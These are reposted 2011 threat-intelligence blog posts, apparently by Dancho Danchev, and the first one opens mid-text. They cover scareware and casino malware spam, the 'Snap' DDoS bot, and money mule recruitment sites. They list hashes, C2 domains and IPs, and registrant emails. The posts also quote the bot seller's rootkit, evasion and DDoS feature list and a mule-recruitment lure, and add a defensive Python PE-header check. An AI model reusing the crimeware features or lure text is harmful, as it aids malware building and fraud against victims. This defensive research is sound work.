Inc." will appear next to the charge on your statement. You 
will receive a separate email confirming your order has been 
despatched. Your purchase and delivery information appears 
below in attached file. 

Thanks again for shopping at Bobijou Inc. " 

Sample attachments: Order_details.zip

Detection rates:

Order_details.exe - [1]Trojan.FakeAV - Result: 24/40 (60.0 %)

MD5: 7c810cbb47c9f937b5f663b51ab7ee50

SHA1: b4faf8c724727381abb11c44b71605ff6e65cbbf

SHA256: 0bda3bdcffdda0fee31fe35cfea2fb644ff8e549a0a83632faa19cd43e02b904

Upon execution phones back to:

kkojjors.net/f/g.php - 95.64.9.15 - Email: admin@firtryt.biz
variantov.com/pusk.exe - 94.63.149.26 - Email: admin@variantov.com

Detection rate for the scareware variant pusk.exe:

pusk.exe - [2]Suspicious.cloud.5 - Result: 4/41 (9.8 %)

MD5: bbd466a67586003776e295eaf3d2976c

SHA1: 6a8e1d84157c76b4c9238fc23d28686244f6650f

SHA256: ee008f9039534f062bd277860060461064e760bdaa90a36595b9780be54a5a05
Upon execution phones back to:

jyluzovunevu.com - 209.160.45.33 - Email: gray@fxmail.net
sesokiqufikeg.com - 209.160.45.34 - Email: gray@fxmail.net
qyqinisope.com - 64.46.38.207 - Email: gray@fxmail.net
hijocyragap.com - 64.46.38.81 - Email: robin@cutemail.org
puhigygapyhi.com - 64.46.38.81 - Email: gray@fxmail.net
zavewuzykubo.com - 64.46.38.80 - Email: robin@cutemail.org
fepigixypo.com - 64.46.38.29 - Email: pyre@cutemail.org
tozibapah.com - 76.73.16.182 - Email: lays@fxmail.net
qebinehuh.com - 76.73.14.182 - Email: lays@fxmail.net
gygipikalyn.com - 76.73.17.242 - Email: ss@cutemail.org
xygorinazecit.com - 76.73.17.70 - Email: ss@cutemail.org
walireqoxyxyt.com - 64.46.39.185 - Email: orbit@fxmail.net
moririnejuf.com - 64.46.39.184 - Email: purse@mail13.com
jydosucin.com - 64.46.39.200 - Email: arm@fxmail.net
libynozegokido.com - 64.46.39.186 - Email: orbit@fxmail.net
zidacofodafur.com - 64.46.39.212 - Email: gown@cutemail.org
fequxukovo.com - 67.196.15.136 - Email: arm@fxmail.net
gyxyqimacik.com - 67.196.15.138 - Email: purse@mail13.com
wizyvopyla.com - 67.196.15.137 - Email: arm@fxmail.net
gyricehagupy.com - 67.196.15.139 - Email: purse@mail13.com
punemipaqatyc.com - 67.196.15.141 - Email: ulcer@mailae.com
gehotigyry.com - 67.196.15.140 - Email: hp@mail13.com
vufekihoto.com - 67.196.15.105 - Email: arm@fxmail.net
huzomohidid.com - 67.196.15.104 - Email: arm@fxmail.net
posufejez.com - 67.196.15.107 - Email: purse@mail13.com
gewexyvunokyk.com - 67.196.15.106 - Email: purse@mail13.com
fowyqypacytucy.com - 209.160.45.32 - Email: soup@fastermail.ru
koduzuwobow.com - 209.160.45.130 - Email: pyre@cutemail.org
ciluvekypomow.com - 78.46.105.205 - Email: hips@cutemail.org
hitaxodupi.com - 64.46.38.30

Monitoring of the campaign is ongoing. 

Related posts: 

[3] Spamvertised "Reqest Rejected" Campaign Serving Scareware

[4] Spamvertised DHL Notifications Scareware Campaign

[5] Spamvertised Post Office Express Mail (USPS) Emails Serving Malware

[6] Spamvertised United Parcel Service notifications serve malware

[7] Spamvertised FedEx Notifications Spread Malware

[8] Spamvertised DHL Notification Malware Campaign

[9] More Spamvertised DHL Notifications Spread Malware

This post has been reproduced from [10]Dancho Danchev's blog. Follow him [11]on Twitter.

1. http://www.virustotal.com/file-scan/report.html?id=0bda3bdcffdda0fee31fe35cfea2fb644ff8e549a0a83632faa19cd43e02b904-1303915483

2. http://www.virustotal.com/file-scan/report.html?id=ee008f9039534f062bd277860060461064e760bdaa90a36595b9780be54a5a05-1303916125

3. http://ddanchev.blogspot.com/2011/04/spamvertised-reqest-rejected-campaign.html

4. http://ddanchev.blogspot.com/2011/04/spamvertised-dhl-notifications.html

5. http://ddanchev.blogspot.com/2011/03/spamvertised-post-office-express-mail.html

6. http://ddanchev.blogspot.com/2011/03/spamvertised-united-parcel-service.html

7. http://ddanchev.blogspot.com/2011/03/spamvertised-fedex-notifications-spread.html

8. http://ddanchev.blogspot.com/2011/03/spamvertised-dhl-notificication-malware.html

9. http://ddanchev.blogspot.com/2011/03/more-spamvertised-dhl-notifications.html

10. http://ddanchev.blogspot.com/

11. http://twitter.com/danchodanchev
Summarizing ZDNet's Zero Day Posts for April (2011-05-09 12:50)

The following is a brief summary of all of my posts at ZDNet's Zero Day for April. You can subscribe to my [1]personal RSS feed, [2]Zero Day's main feed, or follow me on Twitter:

Recommended reading:

• [3] Netcraft survey indicates slow adoption of Extended Validation SSL certificates

01. [4]Spamvertised "Reqest Rejected" campaign leads to scareware

02. [5]Spamvertised 'Facebook. Your password has been changed!' emails lead to malware

03. [6]Malware Watch: 'Spam is sent from your Facebook account'; Spamvertised malicious photos

04. [7]Spamvertised Easter Greetings lead to malware

05. [8]Netcraft survey indicates slow adoption of Extended Validation SSL certificates

06. [9]'You've got a postcard' emails lead to exploits and scareware

07. [10]Fake antivirus for mobile platform spotted

This post has been reproduced from [11]Dancho Danchev's blog. Follow him [12]on Twitter.

1. http://www.zdnet.com/topics/dancho+danchev?o=1&mode=rss&tag=mantle_skin;content

2. http://feeds.feedburner.com/zdnet/security

3. http://www.zdnet.com/blog/security/netcraft-survey-indicates-slow-adoption-of-extended-validation-ssl-certificates/8576

4. http://www.zdnet.com/blog/security/spamvertised-reqest-rejected-campaign-leads-to-scareware/8529

5. http://www.zdnet.com/blog/security/spamvertised-facebook-your-password-has-been-changed-emails-lead-to-malware/8545

6. http://www.zdnet.com/blog/security/malware-watch-spam-is-sent-from-your-facebook-account-spamvertised-malicious-photos/8565

7. http://www.zdnet.com/blog/security/spamvertised-easter-greetings-lead-to-malware/8571

8. http://www.zdnet.com/blog/security/netcraft-survey-indicates-slow-adoption-of-extended-validation-ssl-certificates/8576

9. http://www.zdnet.com/blog/security/youve-got-a-postcard-emails-lead-to-exploits-and-scareware/8590

10. http://www.zdnet.com/blog/security/fake-antivirus-for-mobile-platform-spotted/8594

11. http://ddanchev.blogspot.com/

12. http://twitter.com/danchodanchev
Don't Play Poker on an Infected Table - Part Five (2011-05-09 15:52)

A currently spamvertised campaign is enticing end users into downloading a fraudulent online gambling application, KingSpinEN.exe. The campaign is part of last month's [1]Don't Play Poker on an Infected Table - Part Four series.

Detection rate:

KingSpinEN.exe - [2]W32/Casino.F.gen!Eldorado - Result: 16/43 (37.2 %)

MD5: ead8156a838842bc8463995a91eee08b

SHA1: 239594a514c461c63dc8da69b08b9b63baaf2579

SHA256: 491c291eaed67268d14a36470e5d6f6d4ed829055fe4a2897ac5f050b50a2e36

Upon execution phones back to:

- download.thepalacegroupgaming.com/tracking.aspx?ul=en&casino=spinpalace&banner_tag=a20337&uuid=%7b9F9E0585-9340-45C0-9EC7-46FBE5E7127F%7d&state=100
- spinpalace.mgsmup.com/mupp/spinpalace/spinpalace_install.cab
- spinpalace.mgsmup.com/mupp/spinpalace/spinpalace.cab
- download.thepalacegroupgaming.com/tracking.aspx?ul=en&casino=spinpalace&banner_tag=a20337&uuid=%7b9F9E0585-9340-45C0-9EC7-46FBE5E7127F%7d&state=422
- marketing.valueactive.eu/VIP/animations/en/movies_en.htm



Portfolio of fraudulent online gambling domains part of the campaign. The majority are hosted within AS49130, ARNET-AS SC ArNet Connection SRL:

casino-elit-super.ru - 89.45.14.12
casinogoldsuper.ru - 89.45.14.12
casinokingsuper.ru - 89.45.14.12
casino-king-super.ru - 89.45.14.12
casinolabsuper.ru - 89.45.14.12
casino-lux-super.ru - 89.45.14.12
casinomultisuper.ru - 89.45.14.12
casinonetsuper.ru - 89.45.14.12
casino-net-super.ru - 89.45.14.12
casinonextvip.ru - 89.45.14.12
casino-online-super.ru - 90.182.175.234
casinopartysuper.ru - 90.182.175.234
casino-party-super.ru - 90.182.175.234
casinoplazasuper.ru - 90.182.175.234
casinostarsuper.ru - 90.182.175.234
casinosuperelit.ru - 89.45.14.12
casino-super-elit.ru - 89.45.14.12
casinosuperking.ru - 89.45.14.12
casino-super-king.ru - 89.45.14.12
casinosupermulti.ru - 89.45.14.12
casinosupernet.ru - 89.45.14.12
casino-super-net.ru - 89.45.14.12
casino-super-online.ru - 90.182.175.234
casinosupervip.ru - 89.45.14.12
casino-super-vip.ru - 89.45.14.12
casinosuperweb.ru - 89.45.14.12
casino-super-web.ru - 89.45.14.12
casinosuperwin.ru - 89.45.14.12
casino-super-win.ru - 89.45.14.12
casinovipsuper.ru - 89.45.14.12
casino-vip-super.ru - 89.45.14.12
casino-win-super.ru - 89.45.14.12
cazino-cash-multi.ru - 89.45.14.12
cazino-party-royal.ru - 89.45.14.12
cazinopartyweb.ru - 89.45.14.12
cazino-party-web.ru - 89.45.14.12
cazinopartywin.ru - 89.45.14.12
cazino-party-win.ru - 89.45.14.12
cazinoplazawin.ru - 89.45.14.12
cazinoplazaworld.ru - 89.45.14.12
cazino-plaza-world.ru - 89.45.14.12
cazinowinplaza.ru - 89.45.14.12
cazino-win-plaza.ru - 89.45.14.12
cazinoworldplaza.ru - 89.45.14.12
cazino-world-plaza.ru - 89.45.14.12
elitcasinosuper.ru - 89.45.14.12
elit-casino-super.ru - 89.45.14.12
elitsupercasino.ru - 89.45.14.12
elit-super-casino.ru - 89.45.14.12
gamelabonline.ru - 78.46.105.205
gameonlinelab.ru - 78.46.105.205
game-party-royal.ru - 78.46.105.205
gamezlabonline.ru - 89.45.14.12
gamezmultilab.ru - 89.45.14.12
gamez-net-online.ru - 89.45.14.12
gamezonlinenet.ru - 89.45.14.12
gamez-party-royal.ru - 89.45.14.12
gamez-party-web.ru - 89.45.14.12
gamezpartywin.ru - 89.45.14.12
gamez-party-win.ru - 89.45.14.12
gamez-plaza-win.ru - 89.45.14.12
gamezplazaworld.ru - 89.45.14.12
gamez-plaza-world.ru - 89.45.14.12
gamez-vegas-web.ru - 89.45.14.12
gamezweblab.ru - 89.45.14.12
gamezwinplaza.ru - 89.45.14.12
gamez-win-plaza.ru - 89.45.14.12
gamezworldplaza.ru - 89.45.14.12
joker-gamez-web.ru - 89.45.14.12
kingcasinosuper.ru - 89.45.14.12
king-casino-super.ru - 89.45.14.12
kinggagnerr.net - 90.182.175.234
kingsupercasino.ru - 89.45.14.12
king-super-casino.ru - 89.45.14.12
lab-cazino-multi.ru - 89.45.14.12
lab-cazino-online.ru - 89.45.14.12
labgamezonline.ru - 89.45.14.12
lab-gamez-web.ru - 89.45.14.12
labonlinecazino.ru - 89.45.14.12
labonlinegame.ru - 78.46.105.205
labvegascazino.ru - 89.45.14.12
luxcasinosuper.ru - 89.45.14.12
luxnextcasino.ru - 89.45.14.12
lux-next-casino.ru - 89.45.14.12
multicasinosuper.ru - 89.45.14.12
multilabgame.ru - 78.46.105.205
multisupercasino.ru - 89.45.14.12
netcasinosuper.ru - 89.45.14.12
net-casino-super.ru - 89.45.14.12
netpartycazino.ru - 89.45.14.12
netsupercasino.ru - 89.45.14.12
net-super-casino.ru - 89.45.14.12
nextcasinovip.ru - 89.45.14.12
next-casino-vip.ru - 89.45.14.12
next-lux-casino.ru - 89.45.14.12
nextvipcasino.ru - 89.45.14.12
onlinecasinosuper.ru - 90.182.175.234
online-casino-super.ru - 90.182.175.234
online-cazino-lab.ru - 89.45.14.12
onlinegameznet.ru - 89.45.14.12
online-gamez-vip.ru - 89.45.14.12
onlinelabcazino.ru - 89.45.14.12
onlinesupercasino.ru - 90.182.175.234
online-super-casino.ru - 90.182.175.234
partycasinosuper.ru - 90.182.175.234
party-casino-web.ru - 78.46.105.205
partycazinonet.ru - 89.45.14.12
party-cazino-royal.ru - 89.45.14.12
partycazinoweb.ru - 89.45.14.12
partycazinowin.ru - 89.45.14.12
partygamezroyal.ru - 89.45.14.12
party-gamez-royal.ru - 89.45.14.12
partygamezwin.ru - 89.45.14.12
party-gamez-win.ru - 89.45.14.12
partynetcazino.ru - 89.45.14.12
party-royal-cazino.ru - 89.45.14.12
party-super-casino.ru - 89.45.14.12
partywebcasino.ru - 78.46.105.205
partywebcazino.ru - 89.45.14.12
partywincazino.ru - 89.45.14.12
party-win-cazino.ru - 89.45.14.12
play-multi-casino.ru - 89.45.14.12
plazacazinowin.ru - 89.45.14.12
plaza-cazino-win.ru - 89.45.14.12
plazacazinoworld.ru - 89.45.14.12
plaza-cazino-world.ru - 89.45.14.12
plaza-gamez-win.ru - 89.45.14.12
plazagamezworld.ru - 89.45.14.12
plaza-gamez-world.ru - 89.45.14.12
plazawincazino.ru - 89.45.14.12
plaza-win-cazino.ru - 89.45.14.12
plazaworldcazino.ru - 89.45.14.12
plaza-world-cazino.ru - 89.45.14.12
royal-party-cazino.ru - 89.45.14.12
star-casino-super.ru - 90.182.175.234
star-super-casino.ru - 90.182.175.234
super-casino-elit.ru - 89.45.14.12
supercasinoking.ru - 89.45.14.12
super-casino-king.ru - 89.45.14.12
supercasinolab.ru - 89.45.14.12
super-casino-land.ru - 90.182.175.234
supercasinomulti.ru - 89.45.14.12
supercasinonet.ru - 89.45.14.12
super-casino-net.ru - 89.45.14.12
supercasinoonline.ru - 90.182.175.234
super-casino-online.ru - 90.182.175.234
super-casino-star.ru - 90.182.175.234
supercasinovip.ru - 89.45.14.12
super-casino-vip.ru - 89.45.14.12
super-casino-web.ru - 89.45.14.12
super-casino-west.ru - 90.182.175.234
supercasinowin.ru - 89.45.14.12
super-casino-win.ru - 89.45.14.12
super-elit-casino.ru - 89.45.14.12
superkingcasino.ru - 89.45.14.12
super-king-casino.ru - 89.45.14.12
super-land-casino.ru - 90.182.175.234
super-multi-casino.ru - 89.45.14.12
supernetcasino.ru - 89.45.14.12
super-net-casino.ru - 89.45.14.12
superonlinecasino.ru - 90.182.175.234
super-online-casino.ru - 90.182.175.234
superpartycasino.ru - 90.182.175.234
super-party-casino.ru - 89.45.14.12
superstarcasino.ru - 90.182.175.234
super-star-casino.ru - 90.182.175.234
super-vip-casino.ru - 89.45.14.12
super-web-casino.ru - 89.45.14.12
super-west-casino.ru - 90.182.175.234
superwincasino.ru - 89.45.14.12
vegas-game-web.ru - 78.46.105.205
vegas-gamez-multi.ru - 89.45.14.12
vegasgamezweb.ru - 89.45.14.12
vipcasinosuper.ru - 89.45.14.12
vip-casino-super.ru - 89.45.14.12
vipnextcasino.ru - 89.45.14.12
vipsupercasino.ru - 89.45.14.12
vip-super-casino.ru - 89.45.14.12
web-casino-super.ru - 89.45.14.12
web-cazino-royal.ru - 89.45.14.12
webgamezroyal.ru - 89.45.14.12
webpartycazino.ru - 89.45.14.12
web-super-casino.ru - 89.45.14.12
west-super-casino.ru - 90.182.175.234
wincasinosuper.ru - 89.45.14.12
win-casino-super.ru - 89.45.14.12
win-cazino-plaza.ru - 89.45.14.12
win-gamez-plaza.ru - 89.45.14.12
winpartycazino.ru - 89.45.14.12
win-party-cazino.ru - 89.45.14.12
winplazacazino.ru - 89.45.14.12
win-plaza-cazino.ru - 89.45.14.12
winsupercasino.ru - 89.45.14.12
win-super-casino.ru - 89.45.14.12
worldcazinoplaza.ru - 89.45.14.12
world-cazino-plaza.ru - 89.45.14.12
worldgamezplaza.ru - 89.45.14.12
world-gamez-plaza.ru - 89.45.14.12
world-plaza-cazino.ru - 89.45.14.12

Monitoring of the campaign is ongoing. 

Related posts: 

[3] Don't Play Poker on an Infected Table - Part Four 

[4] Don't Play Poker on an Infected Table - Part Three 

[5] Don't Play Poker on an Infected Table - Part Two 

[6] Don't Play Poker on an Infected Table 

This post has been reproduced from [7]Dancho Danchev's blog. Follow him [8]on Twitter.

1. http://ddanchev.blogspot.com/2011/04/dont-play-poker-on-infected-table-part.html

2. http://www.virustotal.com/file-scan/report.html?id=491c291eaed67268d14a36470e5d6f6d4ed829055fe4a2897ac5f050b50a2e36-1304948544

3. http://ddanchev.blogspot.com/2011/04/dont-play-poker-on-infected-table-part.html

4. http://ddanchev.blogspot.com/2010/03/dont-play-poker-on-infected-table-part.html

5. http://ddanchev.blogspot.com/2010/02/dont-play-poker-on-infected-table-part.html

6. http://ddanchev.blogspot.com/2007/09/dont-play-poker-on-infected-table.html

7. http://ddanchev.blogspot.com/

8. http://twitter.com/danchodanchev
A Peek Inside a New DDoS Bot - "Snap" (2011-05-09 17:03)

Sampling malicious activity through the eyes of the cybercriminal is always beneficial for spotting valuable trends and fads within the ecosystem in a timely manner, provided a decent sample of malicious activity is obtained.

In this post, we'll review a new DDoS bot on the block - "Snap".

This modular bot differentiates itself by letting the buyer choose which modules are added to the final package, and by offering two "proprietary" DDoS functions, namely TurboSYN and TrafficDDoS. Next to its core DDoS functionality, the coder of the bot also offers form grabbing, reverse SOCKS, mail spamming, IM spamming and exploit-launching functionality.

More details from the actual proposition:

[+] language the bot is coded in: mASM
[+] no external dependencies, no runtimes, no frameworks!
[+] Ability to work with roaming user accounts
[+] modularized structure of the bot
[+] Second Backup Service watches process activity and restarts the bot on failover
[+] User Mode r00tkit
-> [+] runs as a service and hides itself
-> [+] hides & protects root process
-> [+] hides & protects files
-> [+] hides the root processes
-> [+] hides already used local & remote TCP port(s)
-> [+] hides already used local & remote UDP port(s)
-> [+] hides already used regkeys
[+] semi-polymorphic architecture
-> [+] uses random legit process, file & service names
-> [+] generates a unique stub every run
[+] bot doesn't use EOF, has no import table, doesn't need relocation and TLS section => very good crypter support
[+] Unicode support for Asian PCs
[+] detects common sandboxes, virtual OSs, emulators, and analysis tools

[================[ Webpanel ]================]

[+] the web panel is developed with Dreamweaver CS5 and an Ajax framework using MySQL and PHP
[+] multi theme support available
[+] multi command support => every victim can run as many threads as you want it to
[+] reliable protocol which creates the lowest possible server load
[+] modularized structure of the bot

[================[ Modules ]================]

[+] Base price (Core) for 250 $

Loader:
[+] Load module (simple) +0 $
[+] Load module (extended) for 50 $

Proxy:
[+] Socks5 Daemon for 50 $
[+] reverse Socks 4/Socks 4a/Socks 5/HTTP(s) for 150 $

DDoS:
[+] DDoS Module (http/syn) for 50 $
[+] DDoS Module (full) for 100 $

DDoS (full) + Load module (extended) + Socks5 Daemon for 400 $
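The advert's "no import table, doesn't need relocation and TLS section" line is a hunting heuristic in its own right: those three PE data directories can be read straight from the headers, and an image that leaves all three empty is rare outside packed or crypted malware. What follows is an added example, not code from the Snap author or from this post; it builds two minimal PE32 header images in memory (constructed test data, not real samples) and checks the three data directories on each.

```python
import struct

# Data-directory indices from the PE/COFF specification
IMAGE_DIRECTORY_ENTRY_IMPORT = 1
IMAGE_DIRECTORY_ENTRY_BASERELOC = 5
IMAGE_DIRECTORY_ENTRY_TLS = 9


def build_pe(import_size, reloc_size, tls_size):
    """Construct a minimal PE32 header in memory: MZ stub with e_lfanew,
    'PE\\0\\0' signature, COFF header and a PE32 optional header carrying 16
    data directories. Constructed test input, not a runnable executable."""
    e_lfanew = 0x40
    dos = bytearray(b"MZ" + b"\x00" * 0x3e)
    struct.pack_into("<I", dos, 0x3c, e_lfanew)
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 96 + 16 * 8, 0x0102)
    opt = bytearray(96)
    struct.pack_into("<H", opt, 0, 0x10B)      # Magic: PE32
    struct.pack_into("<I", opt, 92, 16)        # NumberOfRvaAndSizes
    dirs = [(0, 0)] * 16
    dirs[IMAGE_DIRECTORY_ENTRY_IMPORT] = (0x2000 if import_size else 0, import_size)
    dirs[IMAGE_DIRECTORY_ENTRY_BASERELOC] = (0x3000 if reloc_size else 0, reloc_size)
    dirs[IMAGE_DIRECTORY_ENTRY_TLS] = (0x4000 if tls_size else 0, tls_size)
    table = b"".join(struct.pack("<II", rva, size) for rva, size in dirs)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table


def data_directories(image):
    """Return {index: (rva, size)} for the data directories of a PE32 or
    PE32+ image, raising ValueError on anything that is not a PE."""
    if len(image) < 0x40 or image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", image, 0x3c)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff_off = e_lfanew + 4
    size_of_opt = struct.unpack_from("<H", image, coff_off + 16)[0]
    opt_off = coff_off + 20
    magic = struct.unpack_from("<H", image, opt_off)[0]
    if magic == 0x10B:            # PE32
        count_off, dirs_off = opt_off + 92, opt_off + 96
    elif magic == 0x20B:          # PE32+
        count_off, dirs_off = opt_off + 108, opt_off + 112
    else:
        raise ValueError("unknown optional header magic %#x" % magic)
    count = min(struct.unpack_from("<I", image, count_off)[0], 16)
    end = dirs_off + 8 * count
    if end > opt_off + size_of_opt or end > len(image):
        raise ValueError("data directory table truncated")
    return {i: struct.unpack_from("<II", image, dirs_off + 8 * i) for i in range(count)}


def crypter_friendly_flags(image):
    """The three properties the Snap advert brags about, as booleans."""
    dirs = data_directories(image)

    def empty(index):
        return dirs.get(index, (0, 0))[1] == 0

    return {
        "no_imports": empty(IMAGE_DIRECTORY_ENTRY_IMPORT),
        "no_relocs": empty(IMAGE_DIRECTORY_ENTRY_BASERELOC),
        "no_tls": empty(IMAGE_DIRECTORY_ENTRY_TLS),
    }


def looks_crypter_friendly(image):
    """True when all three hold. An empty import directory is the strong
    signal on its own: nearly every legitimate native executable imports
    at least from kernel32.dll."""
    return all(crypter_friendly_flags(image).values())


# Constructed samples: an ordinary-looking image and a Snap-style one
NORMAL_IMAGE = build_pe(import_size=0x80, reloc_size=0x40, tls_size=0x18)
STRIPPED_IMAGE = build_pe(import_size=0, reloc_size=0, tls_size=0)

if __name__ == "__main__":
    for name, img in (("normal", NORMAL_IMAGE), ("stripped", STRIPPED_IMAGE)):
        print(name, crypter_friendly_flags(img), looks_crypter_friendly(img))
```

pefile would do the parsing in production; the hand-rolled parser is here so the check runs with nothing but the standard library. Treat the result as a triage signal rather than a verdict: .NET assemblies import only mscoree!_CorExeMain, many packers leave a one-entry import table and resolve the rest at run time, and a tiny statically linked tool can legitimately have no relocations or TLS directory.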


Related posts:

[1] Coding Spyware and Malware for Hire
[2] Will Code Malware for Financial Incentives
[3] E-crime and Socioeconomic Factors
[4] Web Based Botnet Command and Control Kit 2.0
[5] BlackEnergy DDoS Bot Web Based
[6] A New DDoS Malware Kit in the Wild
[7] The Cyber Bot - Web Based Malware
[8] The Black Sun Bot - Web Based Malware
[9] Custom DDoS Capabilities Within a Malware
[10] Botnet on Demand Service
[11] Loads.cc - DDoS for Hire Service
[12] Using Market Forces to Disrupt Botnets
[13] Botnet Communication Platforms
[14] A Botnet Master's To-Do List
[15] DDoS on Demand VS DDoS Extortion
[16] How Does a Botnet with 100k Infected PCs Look Like?

This post has been reproduced from [17]Dancho Danchev's blog. Follow him [18]on Twitter.

1. http://ddanchev.blogspot.com/2008/07/coding-spyware-and-malware-for-hire.html
2. http://ddanchev.blogspot.com/2008/11/will-code-malware-for-financial.html
3. http://ddanchev.blogspot.com/2008/01/e-crime-and-socioeconomic-factors.html
4. http://ddanchev.blogspot.com/2008/08/web-based-botnet-command-and-control.html
5. http://ddanchev.blogspot.com/2008/02/blackenergy-ddos-bot-web-based-c.html
6. http://ddanchev.blogspot.com/2007/09/new-ddos-malware-kit-in-wild.html
7. http://ddanchev.blogspot.com/2007/04/shots-from-malicious-wild-west-sample_20.html
8. http://ddanchev.blogspot.com/2007/04/shots-from-malicious-wild-west-sample_7672.html
9. http://ddanchev.blogspot.com/2007/09/custom-ddos-capabilities-within-malware.html
10. http://ddanchev.blogspot.com/2007/10/botnet-on-demand-service.html
11. http://ddanchev.blogspot.com/2008/03/loadsccs-ddos-for-hire-service.html
12. http://ddanchev.blogspot.com/2008/06/using-market-forces-to-disrupt-botnets.html
13. http://ddanchev.blogspot.com/2007/03/botnet-communication-platforms.html
14. http://ddanchev.blogspot.com/2008/04/botnet-masters-to-do-list.html
15. http://ddanchev.blogspot.com/2007/05/ddos-on-demand-vs-ddos-extortion.html
16. http://ddanchev.blogspot.com/2008/05/how-does-botnet-with-100k-infected-pcs.html
17. http://ddanchev.blogspot.com/
18. http://twitter.com/danchodanchev
[Screenshot: the "Alternative Art Ltd" money mule recruitment template, with its "What We Do", "Services Overview", "About us" and "Welcome to Alternative Art Ltd Authorization" sections]

Keeping Money Mule Recruiters on a Short Leash - Part Seven (2011-05-10 12:41)

Continuing what has turned into a tradition, the "[1]Keeping Money Mule Recruiters on a Short Leash" series, in this post we'll review currently active money mule recruitment sites and provide vital OSINT data on what currently acts as the cornerstone of the monetization process cybercriminals rely on: risk forwarding, by recruiting money mules to process fraudulently obtained funds.

Description used on the majority of templates:

"Looking to buy art? Sell art? Alternative Art Ltd is the first choice for artists and buyers alike! Alternative Art Ltd is an effective tool for the artist and emerging artist to market and promote their art in a professional and inexpensive manner. We will market your art to the international community of art buyers. Whether you are looking to buy or sell original art, Alternative Art Ltd is the premier art site for those seeking to buy or sell original art online.

NO COMMISSIONS! Whether you are looking to buy art or sell art, our site is fully optimized to get results FAST! Alternative Art Ltd is the future of buying and selling original art online. Artists who choose to sell their original art will receive maximum marketing exposure. For artists, selling your art has never been easier, faster, or more cost-effective. We will help you sell your original art DIRECTLY to buyers worldwide with NO COMMISSIONS. Those wishing to buy art online are invited to browse our extensive online galleries of original art. Never before has it been this easy for a buyer to select high-quality original art online. We update daily with new original art from our artist members.

Alternative Art Ltd offers casual collectors and serious connoisseurs alike an amazing collection of original art pieces from the world over. You'll enjoy unparalleled customer care from a knowledgeable and friendly staff of experts. For artists, the inconvenience and high costs of traditional galleries are completely eliminated. Our team of experts puts the latest technology to work for you, putting your original art in front of millions of potential art buyers!"

Money mule recruitment domains:

aimic-groupllc.at - Email: admin@aimic-groupllc.at
aimicgroupllc.cc
ALTERNATIVEART-LTD.COM
alternative-art-ltd.net - Email: ibsen@ppmail.ru
artby-gorup.net - Email: admin@artby-gorup.net
artby-group.biz - Email: blonde@bz3.ru
art-marketllc.cc - Email: hear@ppmail.ru - [2]seen here
artsolveltdco.at - Email: admin@artsolveltd.cc
aspecs-group.cc - Email: admin@aspecs-group.cc
ASPECS-GROUP.CC - Email: admin@aspecs-group.cc
callisto-ltdco.net - Email: admin@callisto-ltdco.net
collins-group.cc - Email: admin@megatechservicegroup-ltd.cc
collins-groupusa.com - Email: admin@collins-groupusa.com
COLLINS-GROUPUSA.COM - Email: admin@collins-groupusa.com
competitorgroup-ltd.com - Email: trek@cheapbox.ru
COMPETITOR-UK-GROUP.NET - Email: admin@competitor-uk-group.net
DERWART-GROUP.AT - Email: admin@derwart-group.at
derwart-group.com - Email: admin@ephesgroup-llc.biz
drawmade-group.com - Email: admin@drawmade-group.com
DURLEY-ARTAU.NET - Email: admin@durley-artau.net
DURLEY-ART-GROUP.CC - Email: admin@durley-art-group.cc
ephesgroup-llc.biz - Email: admin@ephesgroup-llc.biz
EPHES-GROUPLLC.CC - Email: admin@ephes-groupllc.cc
ephes-groupllc.net - Email: pious@ppmail.ru
fourthgroup-ltd.cc - Email: rots@cheapbox.ru - [3]seen here
FOURTH-UKLTD.NET - Email: admin@fourth-ukltd.net
generalabbrialgroup-ltd.net - Email: admin@generalabbrialgroup-ltd.net
GENERATION-TEAM.NET - Email: luis@cheapbox.ru
groupinc-upland.biz - Email: admin@groupinc-upland.biz
HELBY-GROUPLTD.BIZ - Email: admin@helby-groupltd.biz
HELBY-GROUP-LTD.CC - Email: packet@bz3.ru
koertig-gmbh.com - Email: usieeobq0604@yahoo.com
kresko-group.biz - Email: admin@kresko-group.biz
LILAC-ANTIQUE.CC - Email: admin@lilac-antique.cc
MASTERPIECE-GROUP.CC - Email: poop@ca4.ru
MASTERPIECE-GROUP.ORG - Email: admin@masterpiece-group.org
megatechservicegroup-ltd.cc - Email: admin@megatechservicegroup-ltd.cc
MEGATECHSERVICE-GROUP-LTD.COM - Email: admin@collins-groupusa.com
millennial-maingrop.net - Email: mock@free-id.ru
mitissanservice-group-ltd.cc - Email: berra@cutemail.org
mitissanservicegroup-ltd.com - Email: alibi@mailae.com
neoline-groupco.cc - Email: admin@neoline-groupco.cc
neoline-llc.net - Email: admin@neoline-llc.net
qead-groupllc.net
QEAD-LLC.BIZ - Email: admin@qead-llc.biz
RICHMOND-ART-GROUP.COM - Email: binary@ca4.ru
RICHMOND-ART-UK.BIZ - Email: admin@richmond-art-uk.biz
sevg-groupnet.com - Email: belle@ca4.ru
SEVG-GROUPNET.COM - Email: belle@ca4.ru
sevg-incgr.net - Email: admin@sevg-incgr.net
SQUIT-GROUP-LLC.BIZ - Email: swept@ca4.ru
SQUITGROUP-LLC.NET - Email: admin@squitgroup-llc.net
targetmarketgroup-llc.cc - Email: admin@targetmarketgroup-llc.cc
targetmarket-groupllc.net
tazprogltd-us.com - Email: admin@tazprogltd-us.com
TONSLEY-ART.COM - Email: pagan@ppmail.ru
tonsley-group-uk.net - Email: admin@tonsley-group-uk.net
WEST-VIEW-ART.CC - Email: knees@free-id.ru
westview-art.net - Email: admin@westview-art.net
Name servers of notice:

NS1.USDENNS.SU - 217.23.15.136
NS2.DNSUS.SU - 87.118.81.7
NS3.NAMEUSNS.SU - 84.19.161.10
ns1.pidnsku.org - 86.55.210.23
ns3.uslcopy.ws - 95.64.9.101
ns2.uslcopy.at - 78.46.105.205
ns2.steisgid.net - 78.46.105.205
ns1.usolomio.cc - 86.55.210.23
ns2.usetmegold.su - 78.46.105.205
ns3.usiami.su - 78.46.105.205
ns1.ukansnami.com - 78.46.105.205
ns3.uknamo.com - 66.199.236.116
ns2.dnsukrect.com - 78.46.105.205

